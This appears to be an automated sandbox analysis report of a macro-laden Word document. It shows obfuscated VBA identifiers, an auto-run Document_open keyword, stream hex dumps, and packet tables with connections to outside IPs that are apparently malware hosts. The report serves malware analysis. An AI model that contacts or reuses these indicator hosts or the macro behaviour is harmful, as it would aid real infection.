RimyuHaBD
#UfOeJ,
WppWDKHVA
"F:\ySkIB\qKFmg\KrORs.CZcSEH"
"F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH"
qKxQJQE
#pIXfAL,
kBZBQ
"O:\GVNBCFD\RBPGB\hCZaAY.voqXFB"
#pGKDuEB,
fMGbFJDRE:
qKxQJQE:
"F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ"
DnGiABxzG
VORRAG
"O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD"
"F:\TtMDAecA\xaSGJIyyl\NmQTHB.LFYtzzGH"
hSQRFSr
Binary
XNcuAGoGD
COxEbv
wcDKJI:
"O:\BNSoFH\dvEzG\mUAiwC.yubtGH"
"F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP"
"F:\kFayEHAHH\ddvLIEC\CfRxAE.EiLcdX"
efPVC
#ksQLDZi,
lOETktD:
pGKDuEB
"F:\SHBduI\KjeOHB\KwnyCEHCA.QsWbrdJu"
#JvVTCss,
Integer
NFVBCEf()
#WppWDKHVA,
JJjHG:
"F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh"
SkWVG()
RzwvkExUI()
vjURJ
GbSOBaBqc
cgFzqJS
Error
#vjURJ,
aPIAJ
LITXEDEBE()
#BIeAA
ywWmAGeG
gNNhpjuZF
RzwvkExUI
"F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH"
ZCRUUEr:
Attribute
ykcixJTsM
#WppWDKHVA
AeWeHOJCg:
Mid(mKbjhqs,
hSQRFSr:
lOETktD
#lkVoRJ
#rxYZps
Close
"O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE"
rxYZps
nOveD
nOveD()
"F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA"
VB_Name
fFPBDj
uUxhxDE:
"F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl"
cgFzqJS:
JJjHG
sYcQrq()
Function
#tSFvVJKHm,
#UfOeJ
#pGKDuEB
#dNGEjAD
COxEbv()
VSbuEj:
#ksQLDZi
sYcQrq
HQLYP
ksQLDZi
#lkVoRJ,
JvVTCss
"F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG"
#efPVC,
ZWAfIID:
gJLEFBFsL
"O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF"
WkbcFJEAD
mKbjhqs
VSbuEj
AUrNIzEG
"F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU"
uUxhxDE
"O:\hLrrUIYmJ\REMOCDBjE\WEMaHYGD.fCCwYV"
"O:\zwfmA\FZQAOA\MnHvGI.RIeDASf"
#aPIAJ,
tSFvVJKHm

VBA Code

VBA File Name: Ouz_y28f7ehnqn, Stream Size: 1113

General
Stream Path:	Macros/VBA/Ouz_y28f7ehnqn
VBA File Name:	Ouz_y28f7ehnqn
Stream Size:	1113
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 06 12 10 98 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

VBA File Name: Z5ncc5dwidbkjld, Stream Size: 702

General
Stream Path:	Macros/VBA/Z5ncc5dwidbkjld
VBA File Name:	Z5ncc5dwidbkjld
Stream Size:	702
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 06 12 4d 00 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 121

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	121
Entropy:	4.36374049783
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . M i c r o s o f t O f f i c e W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.24979504615
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 576

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	576
Entropy:	4.29333303912
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 10 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6493

General
Stream Path:	1Table
File Type:	data
Stream Size:	6493
Entropy:	6.028999636
Base64 Encoded:	True
Data ASCII:	f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	66 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99185

General
Stream Path:	Data
File Type:	data
Stream Size:	99185
Entropy:	7.38960224856
Base64 Encoded:	True
Data ASCII:	q . . . D . d . . . . . . . . . . . . . . . . . . . . . J F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . A . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . . . . . . . . . . . R . . . . . . . . . I W . . . . e . . + . " a . I . . . . . . . . . . . D . . . . . . . . F . . . . . . I W . . . . e . . + . " a . I . . . . . . .
Data Raw:	71 83 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 46 ef 1f 08 02 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 83 00 0b f0 46 00 00 00 bf 00 04 00 04 00 04 41 01 00 00 00 05 c1 02 00 00 00 3f 01 00 00 06 00 bf 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	517
Entropy:	5.55798386141
Base64 Encoded:	True
Data ASCII:	I D = " { B 4 0 1 A A D A - A 5 D 9 - 4 A 5 B - B 2 C F - 6 8 1 6 1 E D 3 5 F F D } " . . D o c u m e n t = O u z _ y 2 8 f 7 e h n q n / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z 5 n c c 5 d w i d b k j l d . . M o d u l e = J w q 9 b 1 l b 0 h m m 7 . . E x e N a m e 3 2 = " S 0 z x n a n c z t d " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A E A C 8 3 E 1 8 3 2 1 B F 2 5 B F 2 5 B F 2 5 B F 2 5 " . . D P B = "
Data Raw:	49 44 3d 22 7b 42 34 30 31 41 41 44 41 2d 41 35 44 39 2d 34 41 35 42 2d 42 32 43 46 2d 36 38 31 36 31 45 44 33 35 46 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4f 75 7a 5f 79 32 38 66 37 65 68 6e 71 6e 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 35 6e 63 63 35 64 77 69 64 62 6b 6a 6c 64 0d 0a 4d 6f 64 75 6c 65 3d 4a 77 71 39 62 31 6c 62 30 68 6d 6d 37 0d 0a 45

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 137

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	137
Entropy:	3.82716267344
Base64 Encoded:	False
Data ASCII:	O u z _ y 2 8 f 7 e h n q n . O . u . z . _ . y . 2 . 8 . f . 7 . e . h . n . q . n . . . Z 5 n c c 5 d w i d b k j l d . Z . 5 . n . c . c . 5 . d . w . i . d . b . k . j . l . d . . . J w q 9 b 1 l b 0 h m m 7 . J . w . q . 9 . b . 1 . l . b . 0 . h . m . m . 7 . . . . .
Data Raw:	4f 75 7a 5f 79 32 38 66 37 65 68 6e 71 6e 00 4f 00 75 00 7a 00 5f 00 79 00 32 00 38 00 66 00 37 00 65 00 68 00 6e 00 71 00 6e 00 00 00 5a 35 6e 63 63 35 64 77 69 64 62 6b 6a 6c 64 00 5a 00 35 00 6e 00 63 00 63 00 35 00 64 00 77 00 69 00 64 00 62 00 6b 00 6a 00 6c 00 64 00 00 00 4a 77 71 39 62 31 6c 62 30 68 6d 6d 37 00 4a 00 77 00 71 00 39 00 62 00 31 00 6c 00 62 00 30 00 68 00 6d

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3895

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3895
Entropy:	5.10348295591
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: Macros/VBA/dir, File Type: Apollo m68k COFF executable not stripped - version 18435, Stream Size: 667

General
Stream Path:	Macros/VBA/dir
File Type:	Apollo m68k COFF executable not stripped - version 18435
Stream Size:	667
Entropy:	6.36338461124
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . t . m . . . . ! O f f i c
Data Raw:	01 97 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 98 a7 da 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 22574

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	22574
Entropy:	3.92066931997
Base64 Encoded:	False
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . S . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 0d 53 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 58 00 00 ce 90 01 00 ce 90 01 00 0d 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
01/07/21-11:47:08.799892	ICMP	402	ICMP Destination Unreachable Port Unreachable	192.168.2.22	8.8.8.8
01/07/21-11:47:12.031373	ICMP	399	ICMP Destination Unreachable Host Unreachable	10.84.1.70	192.168.2.22
01/07/21-11:47:15.029345	ICMP	399	ICMP Destination Unreachable Host Unreachable	10.84.1.70	192.168.2.22
01/07/21-11:47:21.039486	ICMP	399	ICMP Destination Unreachable Host Unreachable	10.84.1.70	192.168.2.22
01/07/21-11:47:32.773394	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:47:32.773434	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:47:38.088826	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:47:38.088841	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:47:39.372826	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:47:42.622670	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:47:58.632181	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22
01/07/21-11:48:13.482004	ICMP	399	ICMP Destination Unreachable Host Unreachable	58.97.195.135	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 11:52:58.693739891 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:58.842674017 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:58.842772007 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:58.843642950 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:58.992291927 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.950355053 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.950407982 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.950551987 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.950727940 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:59.953725100 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.953752995 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.953790903 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.953821898 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.953918934 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:59.953955889 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:59.953970909 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.954005003 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.954042912 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:52:59.954083920 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:52:59.954157114 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.099921942 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.099987984 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.100018024 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.100065947 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.100245953 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.100303888 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.102900028 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.102955103 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.102993011 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103032112 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103069067 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103116035 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103157043 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103183985 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.103193045 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103220940 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.103230953 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103271008 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103285074 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.103308916 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103347063 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103351116 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.103384972 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103430986 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103472948 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103476048 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.103509903 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.103578091 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.103637934 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.249253988 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249308109 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249345064 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249403000 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249437094 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.249449968 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249489069 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249497890 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.249525070 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249572992 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.249573946 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.249716997 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.252348900 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.252389908 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.252427101 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.252465963 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.252505064 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:00.252532959 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.252613068 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:00.798701048 CET	49712	80	192.168.2.3	193.187.117.26
Jan 7, 2021 11:53:03.812731981 CET	49712	80	192.168.2.3	193.187.117.26
Jan 7, 2021 11:53:05.103666067 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:05.103765011 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:09.860063076 CET	49712	80	192.168.2.3	193.187.117.26
Jan 7, 2021 11:53:21.897917032 CET	49711	80	192.168.2.3	66.85.46.76
Jan 7, 2021 11:53:21.980900049 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.048924923 CET	80	49711	66.85.46.76	192.168.2.3
Jan 7, 2021 11:53:22.130624056 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.130743980 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.130922079 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.280467033 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.396975040 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397031069 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397078991 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397120953 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397157907 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397161007 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.397196054 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397207975 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.397232056 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397242069 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.397722960 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397763968 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.397790909 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.412858009 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.412991047 CET	49721	80	192.168.2.3	70.32.23.58
Jan 7, 2021 11:53:22.547075987 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.547132015 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.547171116 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.547207117 CET	80	49721	70.32.23.58	192.168.2.3
Jan 7, 2021 11:53:22.547229052 CET	49721	80	192.168.2.3	70.32.23.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 11:52:50.368876934 CET	50620	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:52:50.433484077 CET	53	50620	8.8.8.8	192.168.2.3
Jan 7, 2021 11:52:51.001122952 CET	64938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:52:51.099854946 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 11:52:52.014971018 CET	64938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:52:52.086900949 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 11:52:53.030926943 CET	64938	53	192.168.2.3	8.8.8.8
Jan 7, 2021 11:52:53.087532997 CET	53	64938	8.8.8.8	192.168.2.3
Jan 7, 2021 11:52:55.046964884 CET	64938	53	192.168.2.3	8.8.8.8
